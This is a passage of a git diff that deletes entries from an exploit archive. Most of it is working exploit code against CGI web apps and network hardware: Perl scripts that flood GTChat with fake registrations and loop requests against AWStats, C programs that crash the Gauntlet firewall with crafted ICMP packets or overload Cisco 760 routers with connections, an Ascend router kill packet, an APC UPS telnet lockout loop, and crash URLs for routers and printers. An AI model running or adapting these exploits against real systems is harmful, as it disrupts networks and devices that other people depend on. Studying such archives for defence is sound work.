if you arguments right, then $server NOT vulnerable, go sleep :)\n"; } -} - if ($mode eq $DoS) -{ - if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() } - print "\nSend $count DoS requests to $server...\n"; - $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server); - for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; } - print "Done, packets sended.\n"; -} - -# milw0rm.com [2005-08-18] diff --git a/platforms/cgi/webapps/1175.pl b/platforms/cgi/webapps/1175.pl deleted file mode 100755 index e717be7a6..000000000 --- a/platforms/cgi/webapps/1175.pl +++ /dev/null 
@@ -1,46 +0,0 @@ -# Use a high user # for best results. /str0ke - -#!/usr/bin/perl -###################### -# codez0red by VTECin5th # -# Feel free to modify/break this script # -# Crappy code is more effective =] # -# I accept no responsibility for misuse or abuse # -###################### -# Usage: xxx.pl www.server.com /directory_to_chat/ #_of_users_to_create -###################### -# Affected Software: GTChat .95 -# Unaffected Software: GTChat .93 -###################### -use IO::Socket; -if (@ARGV < 2){ -print "Usage:\n xxx.pl www.server.com /Path_to_GTChat/ #_of_users_to_create\n"; -print "Example:\n xxx.pl www.serfer.com /GTChat/cgi-bin/ 5"; -exit; -} -$dir = $ARGV[1]; -$numero = $ARGV[2]; -$host = $ARGV[0]; -$host =~ s/http\:\/\///gi; -for ($i = 1; $i <= $numero; $i++) { -$rando = int(rand(234)); -$randy = int(rand(12)); -$whyThem = $randy . $rando . "@" . $randy . ".com"; -$whyMe = "SoSorry" . $rando . $randy; -$lol = "$dir/chat.pl?action=register&name=$whyMe&password=$whyMe&password2=$whyMe&email=$whyThem&privateemail=0"; -$ox=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp') || die "Oh No! You broke teh server!"; -print $ox "GET $lol HTTP/1.1\r\n"; -print $ox "Accept: */*\r\n"; -print $ox "Accept-Language: pt\r\n"; -print $ox "Accept-Encoding: gzip, deflate\r\n"; -print $ox "User-Agent: 1337 pwnz0r\r\n"; -print $ox "Host: $host\r\n"; -print $ox "Connection: Keep-Alive\r\n\r\n\r\n"; -print "currently on: $whyMe \t ($i)\n"; -# Please note, this does not verify whether or not the user is actually being created. -# I assume you know how to use this script. -} -print "Finished creating $numero users"; -close($ox); - -# milw0rm.com [2005-08-23] diff --git a/platforms/cgi/webapps/24619.txt b/platforms/cgi/webapps/24619.txt deleted file mode 100755 index 74c84b7b1..000000000 --- a/platforms/cgi/webapps/24619.txt +++ /dev/null 
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/11226/info
-
-Reportedly EmuLive Server4 is affected by an authentication bypass vulnerability and a denial of service vulnerability. These issues are due to an access validation issue and a failure to handle exceptional conditions.
-
-An attacker may leverage the authentication bypass issue to gain unauthorized access to the administrator scripts of the affected application, facilitating manipulation of various server settings. The denial of service issue may be exploited to cause the affected computer to freeze, denying service to legitimate users.
-
-http://www.example.com//PUBLIC/ADMIN/INDEX.HTM
-
-Note that the '//' after the 'http://www.example.com' is where a session ID would be presented, by providing no data between these slashes a NULL session ID is used to authenticate the attacker.
\ No newline at end of file
diff --git a/platforms/cgi/webapps/3223.pl b/platforms/cgi/webapps/3223.pl
deleted file mode 100755
index 08085080f..000000000
--- a/platforms/cgi/webapps/3223.pl
+++ /dev/null
@@ -1,65 +0,0 @@ -## -## cvstrack-resurrect.pl -- CVSTrac Post-Attack Database Resurrection -## Copyright (c) 2007 Ralf S. Engelschall -## - -use DBI; # requires OpenPKG perl-dbi -use DBD::SQLite; # requires OpenPKG perl-dbi, perl-dbi::with_dbd_sqlite=yes -use DBIx::Simple; # requires OpenPKG perl-dbix -use Date::Format; # requires OpenPKG perl-time - -my $db_file = $ARGV[0]; - -my $db = DBIx::Simple->connect( - "dbi:SQLite:dbname=$db_file", "", "", - { RaiseError => 0, AutoCommit => 0 } -); - -my $eow = q{\x00\s.,:;?!)"'}; - -sub fixup { - my ($data) = @_; - if ($$data =~ m:/[^$eow]*/[^$eow]*'[^$eow]+:s) { - $$data =~ s:(/[^$eow]*/[^$eow]*)('[^$eow]+):$1 $2:sg; - return 1; - } - return 0; -} - -foreach my $rec ($db->query("SELECT name, invtime, text FROM wiki")->hashes()) { - if (&fixup(\$rec->{"text"})) { - printf("++ adjusting Wiki page \"%s\" as of %s\n", - $rec->{"name"}, time2str("%Y-%m-%d %H:%M:%S", -$rec->{"invtime"})); - $db->query("UPDATE wiki SET text = ? WHERE name = ? AND invtime = ?", - $rec->{"text"}, $rec->{"name"}, $rec->{"invtime"}); - } -} -foreach my $rec ($db->query("SELECT tn, description, remarks FROM ticket")->hashes()) { - if (&fixup(\$rec->{"description"}) or &fixup(\$rec->{"remarks"})) { - printf("++ adjusting ticket #%d\n", - $rec->{"tn"}); - $db->query("UPDATE ticket SET description = ?, remarks = ? WHERE tn = ?", - $rec->{"description"}, $rec->{"remarks"}, $rec->{"tn"}); - } -} -foreach my $rec ($db->query("SELECT tn, chngtime, oldval, newval FROM tktchng")->hashes()) { - if (&fixup(\$rec->{"oldval"}) or &fixup(\$rec->{"newval"})) { - printf("++ adjusting ticket [%d] change as of %s\n", - $rec->{"tn"}, time2str("%Y-%m-%d %H:%M:%S", $rec->{"chngtime"})); - $db->query("UPDATE tktchng SET oldval = ?, newval = ? WHERE tn = ? 
AND chngtime = ?", - $rec->{"oldval"}, $rec->{"newval"}, $rec->{"tn"}, $rec->{"chngtime"}); - } -} -foreach my $rec ($db->query("SELECT cn, message FROM chng")->hashes()) { - if (&fixup(\$rec->{"message"})) { - printf("++ adjusting change [%d]\n", - $rec->{"cn"}); - $db->query("UPDATE chng SET message = ? WHERE cn = ?", - $rec->{"message"}, $rec->{"cn"}); - } -} - -$db->commit(); -$db->disconnect(); - -# milw0rm.com [2007-01-29] diff --git a/platforms/cgi/webapps/817.pl b/platforms/cgi/webapps/817.pl deleted file mode 100755 index b8e34a6fe..000000000 --- a/platforms/cgi/webapps/817.pl +++ /dev/null @@ -1,44 +0,0 @@ -#!/usr/bin/perl -# -# -# Summarized the advisory www.ghc.ru GHC: /str0ke -# -# [0] Exploitable example (raw log plugin): -# Attacker can read sensitive information -# -# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog -# -# [1] Perl code execution. (This script) -# -# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent -# -# [2] Arbitrary plugin including. -# -# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib -# -# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development). -# Every user can access debug function: -# -# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1 -# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2 -# -# Be sure to change the $server + /cgi-bin location /str0ke -# - -use IO::Socket; -$server = 'www.example.com'; -sub ConnectServer { -$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") -|| die "Error\n"; -print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n"; -print $socket "Host: $server\n"; -print $socket "Accept: */*\n"; -print $socket "\n\n"; -} - -while () { -$rp = rand; -&ConnectServer; -} - -# milw0rm.com [2005-02-14] 
diff --git a/platforms/freebsd/local/19505.c b/platforms/freebsd/local/19505.c deleted file mode 100755 index 8e469805e..000000000 --- a/platforms/freebsd/local/19505.c +++ /dev/null @@ -1,58 +0,0 @@ -source: http://www.securityfocus.com/bid/653/info - -A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out). - -FreeBSD versions earlier than 3.0 are not vulnerable, nor is the original 4.4BSD-Lite code. - -#include -#include -#include - -#define NFILE 64 -#define NLINK 30000 -#define NCHAR 245 - -int -main() -{ - char junk[NCHAR+1], - dir[2+1+2+1], file1[2+1+2+1+NCHAR+3+1], file2[2+1+2+1+NCHAR+3+1]; - int i, j; - struct stat sb; - - memset(junk, 'x', NCHAR); - junk[NCHAR] = '\0'; - for (i = 0; i < NFILE; i++) { - printf("\r%02d/%05d...", i, 0), - fflush(stdout); - sprintf(dir, "%02d-%02d", i, 0); - if (mkdir(dir, 0755) < 0) - fprintf(stderr, "mkdir(%s) failed\n", dir), - exit(1); - sprintf(file1, "%s/%s%03d", dir, junk, 0); - if (creat(file1, 0644) < 0) - fprintf(stderr, "creat(%s) failed\n", file1), - exit(1); - if (stat(file1, &sb) < 0) - fprintf(stderr, "stat(%s) failed\n", file1), - exit(1); - for (j = 1; j < NLINK; j++) { - if ((j % 1000) == 0) { - printf("\r%02d/%05d...", i, j), - fflush(stdout); - sprintf(dir, "%02d-%02d", i, j/1000); - if (mkdir(dir, 0755) < 0) - fprintf(stderr, "mkdir(%s) failed\n", dir), - exit(1); - } - sprintf(file2, "%s/%s%03d", dir, junk, j%1000); - if (link(file1, file2) < 0) - fprintf(stderr, "link(%s,%s) failed\n", file1, file2), - exit(1); - if (stat(file2, &sb) < 0) - fprintf(stderr, "stat(%s) failed\n", file2), - exit(1); - } - } - printf("\rfinished successfully\n"); -} 
diff --git a/platforms/hardware/remote/19441.c b/platforms/hardware/remote/19441.c
deleted file mode 100755
index 0be3cd3c7..000000000
--- a/platforms/hardware/remote/19441.c
+++ /dev/null
@@ -1,245 +0,0 @@ -source: http://www.securityfocus.com/bid/556/info - -There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a condition where an ICMP Protocol Problem packet's (ICMP_PARAMPROB) encapsulated IP packet has a random protocol field and certain IP options set. When this specially constructed packet ( [ICMP PARAMPROB][IP with random protocol code and some ip options] ) is sent THROUGH the Gauntlet Firewall (not to the firewall itself), the firewall will hang, looking for the packet in it's transparency tables. - -The packet structure looks like this: - -Begin Packet ------------------------------------------- -[NORMAL IP HEADER] - -[ICMP PARAMPROB HEADER] - --- encapsulated ip packet -- - -[IP HEADER] - -(important fields in ip header) - -ip_p = 98 (let's specify a protocol that doesn't exist) -ip_hl = 0xf (stuff options) - - ------------------------------------------- -End Packet - -An attacker would do the following: - -Construct the [ip-icmp-ip] packet using a raw socket (SOCK_RAW) with the fields set accordingly, destination set to any machine behind the firewall. - -Send the packet(s). - -The number of packets that need to be sent depends on the platform (ie Sol on a Sparc vs BSDI). - -The consequence of this vulnerability being exploited is the target Gauntlet 5.0 firewall being remotely locked up. It should be expected that an attacker would send packets with spoofed source addresses in the ip header making it difficult to trace. - -/* - * Discovered and written by: <- Send money to :-) - * aka Mike Frantzen <- Reply to - * - * Network Associates: "Who's watching your network?" - * MSG.net "Who's watching the watchers?" 
- * - * This can be found online at http://www.msg.net/firewalls/tis/bland.c - * - * Description: - * If you know an IP that will be routed through a Gauntlet 5.0 Firewall, - * you can remotely lock up the firewall (tested against Solaris 2.6 and - * BSDI). It locks up to the point that one packet will disable STOP-A - * (L1-A) on Sparcs and ~3-5 packets will disable Ctrl-Alt-Del on BSDI - * (Ctrl-Alt-Del still prompts Y/N but it never reboots). - * - * **You can NOT send this to the Gauntlet's IP. The packet must be one - * **that would go through the forwarding code. - * - * If you are on local ether to the firewall, set it as your default route - * or otherwise send the packet to the firewall's MAC. - * - * The packet is parsed before the packet filtering rules in Gauntlet. So - * the only known work-around is to ACL out ICMP type 12 at your screening - * router. - * Or you could switch to Gauntlet 5.5 which (in the beta) does not seem to - * be vulnerable -- but 5.5 introduces some new 'issues'. - * - * - * Technical Description of the packet: - * The packet is an ICMP Paramater Problem packet that encapsulates an IP - * packet with IP Options. There is a random protocol in the encapsulated - * IP packet. The trick is: the inner packet MUST have IP Options. Some - * options work, some don't. - * The firewall apparently is looking for the packet (or an entry in its - * transparency table) that matches the encapsulated packet. It just keeps - * looking.... It likely has interrupts masked off on Solaris. - * - * - * You need libnet to link this against. It's a pretty spiffy lib. - * http://www.infonexus.com/~daemon9/Projects/Libnet - * http://www.packetfactory.net/libnet - * - * - * For da script kiddies: - * Compile with 'gcc -o bland bland.c -lnet' - * ./bland -d - * (Did you remember to install Libnet???) - * - * - * If it doesn't compile on your machine: I DON'T CARE!!! This program was - * a quick and dirty hack. 
You try reading a hexdump of a packet off the - * wire and writing something that can reproduce it. - * I know it compiles and works from FreeBSD 3.1 - * - * - * Network Associates (TIS) was notified two weeks ago and they are working - * on a patch. - * - * - * Plugs: - * ISIC -- Program I used (and wrote) to find bugs in Gauntlet's IP stack. - * http://expert.cc.purdue.edu/~frantzen/isic-0.02.tar.gz - * Libnet -- Was able to write the basic exploit in 20 minutes because of - * libnet. See libnet link above. Thanks go out to Route! - * - * - * Credits: - * Mike Frantzen Hey, thats me! - * Mike Scher - * Kevin Kadow <- Gauntlet Random Seed Hole - * Lenard Lynch - * Viki Navratilova - */ - -#include - -int main(int argc, char **argv) -{ - u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0; - u_long *problem = NULL; - u_char *packet = NULL; - int sock, c, len = 0; - long acx, count = 1; - struct icmp *icmp; - struct ip *ip; - - /* It appears that most IP options of length >0 will work - * Works with 128, 64, 32, 16... And the normal ones 137... - * Does not work with 0, 1 */ - u_char data[] = {137}; - int data_len = sizeof(data); - - printf("Written by Mike Frantzen... \n"); - printf("For test purposes only... yada yada yada...\n"); - - src_ip = inet_addr("10.10.10.10"); - - while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) { - switch(c) { - case 'd': dst_ip = libnet_name_resolve(optarg, 1); - break; - case 's': src_ip = libnet_name_resolve(optarg, 1); - break; - case 'D': ins_dst_ip = name_resolve(optarg, 1); - break; - case 'S': ins_src_ip = name_resolve(optarg, 1); - break; - case 'l': data_len = atoi(optarg); - break; - case 'c': if ( (count = atol(optarg)) < 1) - count = 1; - break; - default: printf("Don't understand option.\n"); - exit(-1); - } - } - - if ( dst_ip == 0 ) { - printf("Usage: %s\t -d \t[-s ]\n", - rindex(argv[0], '/') == NULL ? 
argv[0] - : rindex(argv[0], '/') + 1); - printf("\t\t[-S ]\t[-D ]\n"); - printf("\t\t[-l ]\t[-c <# to send>]\n"); - exit(-1); - } - - if ( ins_dst_ip == 0 ) - ins_dst_ip = src_ip; - if ( ins_src_ip == 0 ) - ins_src_ip = dst_ip; - - if ( (packet = malloc(1500)) == NULL ) { - perror("malloc: "); - exit(-1); - } - if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) { - perror("socket: "); - exit(-1); - } - - /* 8 is the length of the ICMP header with the problem field */ - len = 8 + IP_H + data_len; - bzero(packet + IP_H, len); - - libnet_build_ip(len, /* Size of the payload */ - 0xc2, /* IP tos */ - 30241, /* IP ID */ - 0, /* Frag Offset & Flags */ - 64, /* TTL */ - IPPROTO_ICMP, /* Transport protocol */ - src_ip, /* Source IP */ - dst_ip, /* Destination IP */ - NULL, /* Pointer to payload */ - 0, - packet); /* Packet memory */ - - - /* ICMP Header for Parameter Problem - * --------------+---------------+---------------+--------------- - *| Type (12) | Code (0) | Checksum | - * --------------+---------------+---------------+--------------- - *| Pointer | unused | - * --------------+---------------+---------------+--------------- - * Internet Header + 64 bits of original datagram data.... 
- */ - - icmp = (struct icmp *) (packet + IP_H); - problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */ - icmp->icmp_type = ICMP_PARAMPROB; - icmp->icmp_code = 0; /* Indicates a problem pointer */ - *problem = htonl(0x14000000); /* Problem is 20 bytes into it */ - - - /* Need to embed an IP packet within the ICMP */ - ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */ - ip->ip_v = 0x4; /* IPV4 */ - ip->ip_hl = 0xf; /* Some IP Options */ - ip->ip_tos = 0xa3; /* Whatever */ - ip->ip_len = htons(data_len); /* Length of packet */ - ip->ip_id = 30241; /* Whatever */ - ip->ip_off = 0; /* No frag's */ - ip->ip_ttl = 32; /* Whatever */ - ip->ip_p = 98; /* Random protocol */ - ip->ip_sum = 0; /* Will calc later */ - ip->ip_src.s_addr = ins_src_ip; - ip->ip_dst.s_addr = ins_dst_ip; - - /* Move our data block into the packet */ - bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len); - - /* I hate checksuming. Spent a day trying to get it to work in - * perl... That sucked... Tequilla would have helped immensly. - */ - libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len); - - /* Bah... See above comment.... */ - libnet_do_checksum(packet, IPPROTO_ICMP, len); - - - printf("Sending %li packets", count); - for (acx = 0; acx < count; acx++) { - if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H)) - perror("write_ip: "); - else printf("."); - } - printf("\n\n"); - return( 0 ); -} - diff --git a/platforms/hardware/remote/19513.txt b/platforms/hardware/remote/19513.txt deleted file mode 100755 index caf8fdac6..000000000 --- a/platforms/hardware/remote/19513.txt +++ /dev/null 
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/665/info
-
-A vulnerability in the Diva LAN ISDN Modem allows remote malicious users to lock up the modem requiring a hard reset.
-
-The vulnerability manifests itself when a remote users connects to the Diva HTTP port and sends a GET request of the form 'login.html?password='.
-
-Enter the URL 'http://diva/login.htm?password=0123456789012345678901234567890123456789' into your browser, where 'diva' is the IP address of the modem.
\ No newline at end of file
diff --git a/platforms/hardware/remote/19919.c b/platforms/hardware/remote/19919.c
deleted file mode 100755
index 1074613ef..000000000
--- a/platforms/hardware/remote/19919.c
+++ /dev/null
@@ -1,237 +0,0 @@ -source: http://www.securityfocus.com/bid/1211/info - -Opening approximately 98 connections on port 23 will cause Cisco 760 Series Routers to self reboot. Continuously repeating this action will result in a denial of service attack. - -/* Cisco 760 Series Connection Overflow - * - * - * Written by: Tiz.Telesup - * Affected Systems: Routers Cisco 760 Series, I havn't tested anymore - * Tested on: FreeBSD 4.0 and Linux RedHat 6.0 - */ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int net_connect (struct sockaddr_in *cs, char *server, - unsigned short int port, char *sourceip, - unsigned short int sourceport, int sec); - - -void net_write (int fd, const char *str, ...); - - -unsigned long int net_resolve (char *host); - - - - -void -usage (void) -{ - printf ("usage: ./cisco host times\n"); - exit (EXIT_FAILURE); -} - - -int -main (int argc, char *argv[]) -{ - - - char host[256]; - int port,times,count,sd = 0; - int m = 0; - struct sockaddr_in cs; - - - printf ("Cisco 760 series Connection Overflow.\n"); - printf ("-------------------------------------\n"); - - if (argc < 3) - usage(); - - strcpy (host, argv[1]); - times=atoi (argv[2]); - - if ((times < 1) || (times > 10000)) /*Maximum number of connections*/ - usage(); - - - - port =23; /* This might be changed to the telnet port of the router*/ - - - - printf ("Host: %s Times: %d\n", host, times); - for (count=0;countsin_family = AF_INET; - cs->sin_port = htons (port); - - - fd = socket (cs->sin_family, SOCK_STREAM, 0); - if (fd == -1) - return (-1); - - - if (!(cs->sin_addr.s_addr = net_resolve (server))) { - close (fd); - return (-1); - } - - - flags = fcntl (fd, F_GETFL, 0); - if (flags == -1) { - close (fd); - return (-1); - } - n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); - if (n == -1) { - close (fd); - return (-1); - } - - - error = 0; - - - n = connect (fd, (struct sockaddr *) cs, 
sizeof (struct sockaddr_in)); - if (n < 0) { - if (errno != EINPROGRESS) { - close (fd); - return (-1); - } - } - if (n == 0) - goto done; - - - FD_ZERO(&rset); - FD_ZERO(&wset); - FD_SET(fd, &rset); - FD_SET(fd, &wset); - tv.tv_sec = sec; - tv.tv_usec = 0; - - - n = select(fd + 1, &rset, &wset, NULL, &tv); - if (n == 0) { - close(fd); - errno = ETIMEDOUT; - return (-1); - } - if (n == -1) - return (-1); - - - if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { - if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { - len = sizeof(error); - if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { - errno = ETIMEDOUT; - return (-1); - } - if (error == 0) { - goto done; - } else { - errno = error; - return (-1); - } - } - } else - return (-1); - - -done: - n = fcntl(fd, F_SETFL, flags); - if (n == -1) - return (-1); - return (fd); -} - - -unsigned long int -net_resolve (char *host) -{ - long i; - struct hostent *he; - - - i = inet_addr(host); - if (i == -1) { - he = gethostbyname(host); - if (he == NULL) { - return (0); - } else { - return (*(unsigned long *) he->h_addr); - } - } - return (i); -} - - -void -net_write (int fd, const char *str, ...) -{ - char tmp[8192]; - va_list vl; - int i; - - - va_start(vl, str); - memset(tmp, 0, sizeof(tmp)); - i = vsnprintf(tmp, sizeof(tmp), str, vl); - va_end(vl); - - - send(fd, tmp, i, 0); - return; -} \ No newline at end of file diff --git a/platforms/hardware/remote/19923.txt b/platforms/hardware/remote/19923.txt deleted file mode 100755 index a39d6c4c6..000000000 --- a/platforms/hardware/remote/19923.txt +++ /dev/null 
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/1219/info
-
-Large usernames or passwords sent to the router's HTTP interface restart the router. Router log will show "restart not in response to admin command"
-
-Open the router interface with your browser.
-Username: ......................... (x79 +)
-After the router restarts, you can hit refresh on your browser to take it down again.
-
-A simple script or program could be written to keep the router down indefinately.
\ No newline at end of file
diff --git a/platforms/hardware/remote/20090.txt b/platforms/hardware/remote/20090.txt
deleted file mode 100755
index 451b3cc64..000000000
--- a/platforms/hardware/remote/20090.txt
+++ /dev/null
@@ -1,6 +0,0 @@
-source: http://www.securityfocus.com/bid/1491/info
-
-HP JetDirect firmware is vulnerable to a Denial of Service attack. JetDirect devices have an FTP service which fails to properly handle bad FTP commands sent with the ftp "quote" command. This causes the device to stop responding and possibly display an error message. Powering the device off and on is required to regain normal functionality.
-
-ftp
-quote AAAAAAAAAAA
\ No newline at end of file
diff --git a/platforms/hardware/remote/20323.txt b/platforms/hardware/remote/20323.txt
deleted file mode 100755
index b4d1248ef..000000000
--- a/platforms/hardware/remote/20323.txt
+++ /dev/null
@@ -1,18 +0,0 @@
-source: http://www.securityfocus.com/bid/1838/info
-
-
-Cisco devices running IOS software may be prone to a denial of service attack if a URL containing a question mark followed by a slash (?/) is requested. The device will enter an infinite loop when supplied with a URL containing a "?/" and an enable password. Subsequently, the router will crash in two minutes after the watchdog timer has expired and will then reload. In certain cases, the device will not reload and a restart would be required in order to regain normal functionality.
-
-This vulnerability is restricted to devices that do not have the enable password set or if the password is known or can be easily predicted. The vulnerable service is only on by default in the Cisco 1003, 1004 and 1005 routers.
-
-Users can identify vulnerable or invulnerable devices running IOS by logging onto the device and issuing the ?show version? command. If IOS is running on a vulnerable device the command will return ?Internetwork Operating System Software? or ?IOS (tm)? with a version number.
-
-Vulnerable IOS software may be found on the following Cisco devices:
-
-*Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, and 12000 series.
-*Recent versions of LS1010 ATM switch.
-*Catalyst 6000 with IOS.
-*Catalyst 2900XL LAN switch with IOS.
-*Cisco DistributedDirector.
-
-http://target/anytext?/
\ No newline at end of file
diff --git a/platforms/hardware/remote/20332.pl b/platforms/hardware/remote/20332.pl
deleted file mode 100755
index 0d968df1c..000000000
--- a/platforms/hardware/remote/20332.pl
+++ /dev/null
@@ -1,64 +0,0 @@ -source: http://www.securityfocus.com/bid/1855/info - -A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. - -Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable. - -#!/usr/bin/perl - - # - # Ascend Kill II - perl version - # (C) 1998 Rootshell - http://www.rootshell.com/ - - # - # Released: 3/17/98 - # - # Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues - # (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) - # - # NOTE: This program is NOT to be used for malicous purposes. This is - # intenteded for educational purposes only. By using this program - # you agree to use this for lawfull purposes ONLY. - # - # - - use Socket; - - require "getopts.pl"; - - sub AF_INET {2;} - sub SOCK_DGRAM {2;} - - sub ascend_kill { - $remotehost = shift(@_); - chop($hostname = `hostname`); - $port = 9; - $SIG{'INT'} = 'dokill'; - $sockaddr = 'S n a4 x8'; - ($pname, $aliases, $proto) = getprotobyname('tcp'); - ($pname, $aliases, $port) = getservbyname($port, 'tcp') - unless $port =~ /^\d+$/; - ($pname, $aliases, $ptype, $len, $thisaddr) = - gethostbyname($hostname); - $this = pack($sockaddr, AF_INET, 0, $thisaddr); - ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost); - $that = pack($sockaddr, AF_INET, $port, $thataddr); - socket(S, &AF_INET, &SOCK_DGRAM, 0); - $msg = pack("c64", - 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, - 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, - 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, - 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, - 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 
0x53, 0x57, 0x4f, 0x52, 0x44, - 0x50, 0x41, 0x53, 0x53); - for ($i=0; $i<500; $i++) { - $msg .= pack("c1", 0xff); - } - send(S,$msg,0,$that) || die "send:$!"; - } - - if ($ARGV[0] eq '') { - print "usage: akill2.pl \n"; - exit; - } - - &ascend_kill($ARGV[0]); \ No newline at end of file diff --git a/platforms/hardware/remote/20654.pl b/platforms/hardware/remote/20654.pl deleted file mode 100755 index a8903dc4f..000000000 --- a/platforms/hardware/remote/20654.pl +++ /dev/null 
@@ -1,49 +0,0 @@ -source: http://www.securityfocus.com/bid/2430/info - -Symmetra is an Uninterruptable Power Supply manufactured by American Power Conversation Corporation (APC). Symmetra supports network options that allow a remote administrator to access the system via telnet, and gather information from the power supply via SNMP. - -A problem with the network software used with the Symmetra can allow a denial of service to the system, thus preventing administrative access. This problem is due to the handling of the telnet protocol by the firmware of the power supply. The system does not support more than one telnet session at a time, and when it encounters three failed login attempts, discontinues access for a configurable period between 1 and 10 minutes. - -Therefore, it is possible for a malicious user to launch an remote attack against the telnet service of the power supply, and prevent administrative access to the power supply for the duration of the attack. This vulnerability may affect other APC UPS products as well. - -#!/usr/bin/perl -#altomo@nudehackers.com -#apc management card dos - -$user = "blacksun"; -$time = "$ARGV[1]"; - -use IO::Socket; -$ip = "$ARGV[0]"; -$port = "23"; -if ($#ARGV<0) { -print " useage: $0 \n"; -exit(); -} -$socket = IO::Socket::INET->new( -Proto=>"tcp", -PeerAddr=>$ip, -PeerPort=>$port,); - - -print "Apc management card DoS\n"; -print "altomo\@nudehackers.com\n"; - - -sub dos() { -print "DoS started will attack every $time seconds\n"; -print "Ctrl+C to exit\n"; -print $socket "$user\r"; -print $socket "$user\r"; -print $socket "$user\r"; -print $socket "$user\r"; -print $socket "$user\r"; -print $socket "$user\r"; -print "\n"; -close $socket; -sleep($time); -&dos; - -} -&dos; -#hong kong danger duo diff --git a/platforms/hardware/remote/20734.sh b/platforms/hardware/remote/20734.sh deleted file mode 100755 index 645519dc1..000000000 --- a/platforms/hardware/remote/20734.sh +++ /dev/null 
@@ -1,14 +0,0 @@
-source: http://www.securityfocus.com/bid/2551/info
-
-PIX is an enterprise firewall engineered and maintained by Cisco Systems. It is designed to provide robust features and multiple methods of access control and filtering.
-
-A problem with the PIX could allow a denial of service. PIX firewalls using TACACS+ are vulnerable to a resource starvation attack which results in a denial of service. Upon receiving multiple requests for TACACS+ authentication from an unauthorized user, the firewalls resources can be exhausted. This causes the firewall to crash, requiring power cycling to resume regular service.
-
-This makes it possible for a user from either the public or private side of the PIX to crash the firewall, and deny service to legitimate users.
-
-All PIX Firewalls having configuration lines beginning with the following line are affected:
-pixfirewall# aaa authentication
-
-Any configurations not including aaa authentication are not affected.
-
-while (true); do (wget http://external.system 2>/dev/null &); done
\ No newline at end of file
diff --git a/platforms/hardware/remote/33737.py b/platforms/hardware/remote/33737.py
deleted file mode 100755
index 970ec81a9..000000000
--- a/platforms/hardware/remote/33737.py
+++ /dev/null
@@ -1,363 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -# Exploit Title: ZTE and TP-Link RomPager DoS Exploit -# Date: 10-05-2014 -# Server Version: RomPager/4.07 UPnP/1.0 -# Tested Routers: ZTE ZXV10 W300 -# TP-Link TD-W8901G -# TP-Link TD-W8101G -# TP-Link TD-8840G -# Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0 -# Tested on: Kali Linux x86 -# -# Notes: Please note this exploit may contain errors, and -# is provided "as it is". There is no guarantee -# that it will work on your target router(s), as -# the code may have to be adapted. -# This is to avoid script kiddie abuse as well. -# -# Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only. -# Author takes no responsibility for any kind of damage you cause. -# -# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) -# -# Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/ -# Video: https://www.youtube.com/watch?v=1fSECo2ewoo -# Dedicate to Nick Knight and Hood3dRob1n -# -# 